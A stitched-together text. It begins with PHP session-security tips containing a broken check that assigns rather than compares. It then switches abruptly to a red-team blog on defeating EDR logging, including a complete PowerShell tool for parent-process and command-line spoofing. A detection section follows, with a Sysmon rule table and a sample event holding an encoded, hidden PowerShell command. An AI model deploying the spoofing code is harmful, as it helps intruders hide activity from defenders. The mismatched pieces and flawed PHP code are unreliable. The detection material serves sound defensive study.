

Let's start with the good news: the $_SESSION array is by default completely invisible to, and unmanipulable by, the client. It exists on the server, and on the server only, in an execution environment that is not open to the client.

Now back to earth: it is quite easy to get your PHP code "nearly right" and thus open a door between the client and the session as seen by the server. In addition to this, stealing a client session (including a cookie) is quite easy.

I recommend a few mitigations that have proven quite effective:

Do not store a "logged in" value; instead store a "session cookie" value, and set the cookie to the client. On a client request, make something along the lines of $loggedin=($_SESSION=$_COOKIE). This makes the attacker need both: cookie and session ID.

Refresh the session cookie quite often; on a wrong cookie, kill the session. If a black hat steals cookie and session, the next click by the real user will log out both and create a loggable event.

If your requests come from JS, think of creating a simple authentication function: instead of sending the authentication token, salt it, pepper it with a timestamp, then hash it. Make the server check the timestamp.

First, a bit of background on the techniques we'll implement in Visual Basic. I first heard about them in an awesome talk, Red Teaming in the EDR age, presented by Will Burgess at the Wild West Hackin' Fest 2018.

When a process spawns a child process, EDR solutions such as Sysmon log the action and record various information such as the newly created process name, hash and executable path, as well as information about the parent process. This is very handy to build behavioral rules such as "Microsoft Word should never spawn powershell.exe". These are rules that, in my experience, are of low complexity, high added value, and generate a low amount of false positives.

Figure: Example of a powershell process being spawned by Microsoft Word.

It turns out that when creating a process using the Windows native API, you can specify any arbitrary process to be used as the parent process. This is nothing new, so I won't describe it in more depth. For reference, the original post includes a sample piece of C++ code which spawns cmd.exe with an arbitrary process as its parent (the code itself is not reproduced here). Actually, Didier Stevens blogged about this 10 years ago!

Figure: The calc.exe process appears as if it has been spawned by notepad.exe.

Process command line spoofing

This is a newer technique which, as far as I know, was first described by Casey Smith on Twitter, as Will Burgess says in his talk. Adam Chester then published proof-of-concept C++ code on his blog. I encourage you to go and read his article to understand the details of the implementation. But let's take a quick look at how this technique works.

When a process is created, an internal Windows data structure, the Process Environment Block (PEB), is mapped inside the process's virtual memory. This data structure contains a bunch of information about the process itself, such as the list of loaded modules and the command line used to start the process. Since the PEB (and therefore the command line) is stored in the memory space of the process and not in kernel space, it is quite easy to overwrite it, provided we have the appropriate rights on the process.

Figure: The PEB inside notepad.exe's virtual memory space. The region is marked as RW, so we can write to it.

More specifically, the technique works as follows:

1. Create the process in a suspended state.
2. Retrieve the PEB address using NtQueryInformationProcess.
3. Overwrite the command line stored in the PEB using WriteProcessMemory.
4. Resume the process.

This will cause Windows (and EDR solutions such as Sysmon, which record the command line at creation time) to log the command line provided in step (1), even though the process itself will run with the command line written in step (3): it only parses its arguments from the PEB once its main thread is resumed. Two practical caveats: the overwriting command line has to fit in the buffer allocated for the original one, so the fake command line is usually padded; and anything that reads the PEB after the fact, such as Process Explorer or a WMI Win32_Process query, will show the real command line rather than the logged one.

The full proof-of-concept code written by Adam Chester is available on Github.
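To make the two techniques concrete, here is an added example, written for this page rather than taken from the original post or from Adam Chester's proof of concept, that performs both parent process spoofing and command line spoofing from PowerShell through P/Invoke. The function, variable and parameter names are my own. It assumes 64-bit Windows, a 64-bit PowerShell host, and that the caller holds PROCESS_CREATE_PROCESS access to the chosen parent; the offsets it uses (ProcessParameters at PEB+0x20, CommandLine at ProcessParameters+0x70, Buffer at +8 inside the UNICODE_STRING) are the 64-bit layout and differ on 32-bit Windows.

```powershell
# Added example, not code from the original post or from Adam Chester's PoC: parent PID spoofing
# and PEB command line spoofing done from PowerShell via P/Invoke. Assumes 64-bit Windows and a
# 64-bit PowerShell host: the offsets PEB+0x20 (ProcessParameters) and ProcessParameters+0x70
# (CommandLine UNICODE_STRING) are the x64 layout. Test only on machines you are authorised to use.
if (-not ('Native' -as [type])) {
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Native {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFOEX { public STARTUPINFO StartupInfo; public IntPtr lpAttributeList; }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_BASIC_INFORMATION { public IntPtr ExitStatus, PebBaseAddress, AffinityMask, BasePriority, UniqueProcessId, InheritedFromUniqueProcessId; }
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool InitializeProcThreadAttributeList(IntPtr list, int count, int flags, ref IntPtr size);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool UpdateProcThreadAttribute(IntPtr list, uint flags, IntPtr attr, IntPtr value, IntPtr size, IntPtr prev, IntPtr retSize);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool DeleteProcThreadAttributeList(IntPtr list);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool CreateProcess(string app, System.Text.StringBuilder cmdLine, IntPtr pa, IntPtr ta, bool inherit, uint flags, IntPtr env, string dir, ref STARTUPINFOEX si, out PROCESS_INFORMATION pi);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool ReadProcessMemory(IntPtr h, IntPtr addr, byte[] buf, int size, out IntPtr n);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool WriteProcessMemory(IntPtr h, IntPtr addr, byte[] buf, int size, out IntPtr n);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern uint ResumeThread(IntPtr hThread);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern bool CloseHandle(IntPtr h);
    [DllImport("ntdll.dll")] public static extern int NtQueryInformationProcess(IntPtr h, int cls, ref PROCESS_BASIC_INFORMATION pbi, int size, out int ret);
}
"@
}

function Start-SpoofedProcess {
    param(
        [int]$ParentPid,           # the process we want to appear as the parent
        [string]$FakeCommandLine,  # what the kernel callback / Sysmon will record
        [string]$RealCommandLine   # what the new process actually parses; must name the same executable
    )
    if ($RealCommandLine.Length -gt $FakeCommandLine.Length) {
        throw 'The real command line must fit in the fake one''s buffer: pad the fake one with spaces.'
    }
    $M = [Runtime.InteropServices.Marshal]
    # Parent PID spoofing: attach PROC_THREAD_ATTRIBUTE_PARENT_PROCESS (0x00020000) to the new process.
    $hParent = [Native]::OpenProcess(0x0080, $false, $ParentPid)      # 0x0080 = PROCESS_CREATE_PROCESS
    if ($hParent -eq [IntPtr]::Zero) { throw "OpenProcess failed: $($M::GetLastWin32Error())" }
    $size = [IntPtr]::Zero
    [void][Native]::InitializeProcThreadAttributeList([IntPtr]::Zero, 1, 0, [ref]$size)  # sizing call
    $attrList = $M::AllocHGlobal($size)
    if (-not [Native]::InitializeProcThreadAttributeList($attrList, 1, 0, [ref]$size)) { throw 'InitializeProcThreadAttributeList failed' }
    $pParent = $M::AllocHGlobal([IntPtr]::Size)   # the attribute value is a pointer to the HANDLE
    $M::WriteIntPtr($pParent, $hParent)
    if (-not [Native]::UpdateProcThreadAttribute($attrList, 0, [IntPtr]0x00020000, $pParent, [IntPtr][IntPtr]::Size, [IntPtr]::Zero, [IntPtr]::Zero)) { throw 'UpdateProcThreadAttribute failed' }
    $sInfo = New-Object Native+STARTUPINFO
    $sInfo.cb = $M::SizeOf([type][Native+STARTUPINFOEX])
    $si = New-Object Native+STARTUPINFOEX
    $si.StartupInfo = $sInfo          # assign the nested struct whole: $si.StartupInfo.cb = ... would edit a copy
    $si.lpAttributeList = $attrList
    $pi = New-Object Native+PROCESS_INFORMATION

    # Step 1: create suspended with the fake command line. 0x00080000 = EXTENDED_STARTUPINFO_PRESENT, 0x4 = CREATE_SUSPENDED
    $cmd = New-Object System.Text.StringBuilder -ArgumentList $FakeCommandLine
    if (-not [Native]::CreateProcess($null, $cmd, [IntPtr]::Zero, [IntPtr]::Zero, $false, 0x00080004, [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
        throw "CreateProcess failed: $($M::GetLastWin32Error())"
    }
    # Step 2: PEB address via NtQueryInformationProcess(ProcessBasicInformation = 0)
    $pbi = New-Object Native+PROCESS_BASIC_INFORMATION
    $ret = 0
    $status = [Native]::NtQueryInformationProcess($pi.hProcess, 0, [ref]$pbi, $M::SizeOf($pbi), [ref]$ret)
    if ($status -ne 0) { throw ('NtQueryInformationProcess failed: 0x{0:X8}' -f $status) }
    $buf = New-Object byte[] 8
    $n = [IntPtr]::Zero
    [void][Native]::ReadProcessMemory($pi.hProcess, [IntPtr]($pbi.PebBaseAddress.ToInt64() + 0x20), $buf, 8, [ref]$n)
    $procParams = [BitConverter]::ToInt64($buf, 0)             # RTL_USER_PROCESS_PARAMETERS
    [void][Native]::ReadProcessMemory($pi.hProcess, [IntPtr]($procParams + 0x70 + 8), $buf, 8, [ref]$n)
    $cmdBuf = [IntPtr]([BitConverter]::ToInt64($buf, 0))       # CommandLine.Buffer (PWSTR at +8 of the UNICODE_STRING)

    # Step 3: overwrite the buffer with the real command line, then shrink UNICODE_STRING.Length to match
    $bytes = [Text.Encoding]::Unicode.GetBytes($RealCommandLine + "`0")
    if (-not [Native]::WriteProcessMemory($pi.hProcess, $cmdBuf, $bytes, $bytes.Length, [ref]$n)) { throw 'WriteProcessMemory failed' }
    $len = [BitConverter]::GetBytes([UInt16]($RealCommandLine.Length * 2))
    [void][Native]::WriteProcessMemory($pi.hProcess, [IntPtr]($procParams + 0x70), $len, 2, [ref]$n)

    # Step 4: resume; the process parses its arguments from the PEB only now, so it sees the real command line
    [void][Native]::ResumeThread($pi.hThread)
    [void][Native]::DeleteProcThreadAttributeList($attrList); $M::FreeHGlobal($attrList); $M::FreeHGlobal($pParent)
    [void][Native]::CloseHandle($hParent); [void][Native]::CloseHandle($pi.hThread); [void][Native]::CloseHandle($pi.hProcess)
    return $pi.dwProcessId
}

# Usage: spawn powershell.exe as an apparent child of explorer.exe. Sysmon records 'powershell.exe' alone,
# while the process actually runs with the arguments given as -RealCommandLine.
# $explorerPid = (Get-Process explorer)[0].Id
# Start-SpoofedProcess -ParentPid $explorerPid -FakeCommandLine ('powershell.exe' + (' ' * 100)) -RealCommandLine 'powershell.exe -NoProfile -Command Get-Date'
```

Two design points worth noting. The executable is chosen from the fake command line at step 1, so the real command line can only change the arguments, not the image; and the padding on the fake command line is what makes room for the real one, since WriteProcessMemory cannot grow the buffer the kernel allocated. Shrinking UNICODE_STRING.Length afterwards is my own addition so that anything reading the PEB later sees exactly the real command line instead of the real one followed by leftover padding.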
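From the defender's side, as an added example that is not part of the original post: a PowerShell rule of the "Word should never spawn powershell.exe" kind applied to Sysmon Event ID 1 records, together with the check a hunter would run to catch the PEB overwrite, namely comparing the command line Sysmon recorded at creation with what the process reports through WMI now. The function names, the rule table and the two sample event messages are my own constructions.

```powershell
# Added example, not from the original post: a parent/child behavioural rule over Sysmon Event ID 1
# records, and the creation-time vs. live command line comparison that exposes the PEB overwrite.
# The two event messages at the bottom are constructed samples, not real logs.
function ConvertFrom-SysmonMessage {
    # Sysmon renders EventData as "Key: Value" lines in the event message; turn them into a hashtable.
    param([string]$Message)
    $fields = @{}
    foreach ($line in ($Message -split "`r?`n")) {
        if ($line -match '^\s*(\w+):\s*(.*)$') { $fields[$Matches[1]] = $Matches[2] }
    }
    return $fields
}

# Rule table (illustrative, my own): parent image file name -> child images it should never spawn.
$ParentChildRules = @{
    'WINWORD.EXE' = @('powershell.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe')
    'EXCEL.EXE'   = @('powershell.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe')
    'OUTLOOK.EXE' = @('powershell.exe', 'cmd.exe')
}

function Test-ParentChildRule {
    # Returns an alert string when the record violates a rule, $null otherwise.
    param([hashtable]$Record, [hashtable]$Rules = $ParentChildRules)
    $parent = [IO.Path]::GetFileName($Record['ParentImage'])
    $child  = [IO.Path]::GetFileName($Record['Image'])
    foreach ($p in $Rules.Keys) {
        if (($parent -ieq $p) -and ($Rules[$p] -icontains $child)) {
            return "ALERT: $parent spawned $child (pid $($Record['ProcessId'])): $($Record['CommandLine'])"
        }
    }
    return $null
}

function Compare-RecordedCommandLine {
    # Sysmon captured the command line when the process was created; Win32_Process reads the PEB now.
    # After a PEB overwrite the two differ, which is exactly the artefact the spoofing leaves behind.
    param([int]$ProcessId, [string]$RecordedCommandLine)
    $live = (Get-CimInstance Win32_Process -Filter "ProcessId = $ProcessId").CommandLine
    if ($null -eq $live) { return "pid $ProcessId has already exited" }
    if ($live.Trim() -ne $RecordedCommandLine.Trim()) {
        return "ALERT: pid $ProcessId was logged as [$($RecordedCommandLine.Trim())] but now reports [$($live.Trim())]"
    }
    return $null
}

# Constructed Event ID 1 messages, reduced to the fields the rules use.
$macroDirect = @"
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -nop -w hidden -enc SQBFAFgA
ProcessId: 4242
ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
ParentProcessId: 1234
"@
$macroSpoofed = @"
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe
ProcessId: 4243
ParentImage: C:\Windows\explorer.exe
ParentProcessId: 2000
"@
Test-ParentChildRule (ConvertFrom-SysmonMessage $macroDirect)    # fires: WINWORD.EXE spawned powershell.exe
Test-ParentChildRule (ConvertFrom-SysmonMessage $macroSpoofed)   # $null: the spoofed parent defeats the rule
# For the spoofed case the remaining signal is the command line: compare what was logged with what the PEB now holds.
# Compare-RecordedCommandLine -ProcessId 4243 -RecordedCommandLine 'powershell.exe'
```

The second sample shows why the parent rule alone is not enough once parent spoofing is in play: the record is indistinguishable from a user launching PowerShell from Explorer. The command line comparison only works while the process is still alive, which is why it belongs in a hunt or in a near-real-time pipeline rather than in after-the-fact log review.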
